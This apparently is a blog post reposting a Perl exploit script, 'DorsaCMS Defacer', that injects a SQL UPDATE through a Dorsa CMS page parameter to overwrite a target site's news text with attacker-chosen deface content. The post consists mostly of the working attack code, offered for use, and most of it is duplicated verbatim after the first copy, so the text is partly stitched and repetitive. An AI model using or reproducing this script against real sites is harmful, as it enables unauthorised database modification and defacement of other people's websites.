Dorsa is a cms that have certificate of security
u can see certificate of security from this link :
http://dorsagroup.ir/ShowPage.aspx?page_=form&order=show&lang=1&sub=0&PageId=69&tempname=Other
but i found a blind SQL Injection Vulnerability in this CMS
http://packetstormsecurity.org/files/view/96736/dorsacmsdefacer-sql.txt
exploit code(tested on windows xp ) :
#!/usr/bin/perl
#d3c0der
system('color a');
system('cls');
system('title DorsaCMS Defacer');
print q{
===================================================
-= ** =-
DorsaCMS Defacer
[+] Coded by d3c0der => d3c0der@hotmail.com
[+] AttackerZ Under Ground Group => wwW.Attackerz.iR
-= ** =-
===================================================
};
use HTTP::Request;
use LWP::UserAgent;
print "~# Target : ";
$site=<STDIN>;
chomp $site;
print "~# PageID : ";
$id=<STDIN>;
chomp $id;
print "~# Deface Text : ";
$def=<STDIN>;
chomp $def;
if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
print "\n";
print "->hacking : $site\n";
@path1=("ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id update news set Comment='$def';--");
foreach $ways(@path1){
$final=$site.$ways;
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
}
print "[-] now this url is hacked $siteShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id\n";
##
# By d3c0der
##
.
http://dorsagroup.ir/ShowPage.aspx?page_=form&order=show&lang=1&sub=0&PageId=69&tempname=Other
but i found a blind SQL Injection Vulnerability in this CMS
http://packetstormsecurity.org/files/view/96736/dorsacmsdefacer-sql.txt
exploit code(tested on windows xp ) :
#!/usr/bin/perl
#d3c0der
system('color a');
system('cls');
system('title DorsaCMS Defacer');
print q{
===================================================
-= ** =-
DorsaCMS Defacer
[+] Coded by d3c0der => d3c0der@hotmail.com
[+] AttackerZ Under Ground Group => wwW.Attackerz.iR
-= ** =-
===================================================
};
use HTTP::Request;
use LWP::UserAgent;
print "~# Target : ";
$site=<STDIN>;
chomp $site;
print "~# PageID : ";
$id=<STDIN>;
chomp $id;
print "~# Deface Text : ";
$def=<STDIN>;
chomp $def;
if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
print "\n";
print "->hacking : $site\n";
@path1=("ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id update news set Comment='$def';--");
foreach $ways(@path1){
$final=$site.$ways;
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
}
print "[-] now this url is hacked $siteShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id\n";
##
# By d3c0der
##
.
No comments:
Post a Comment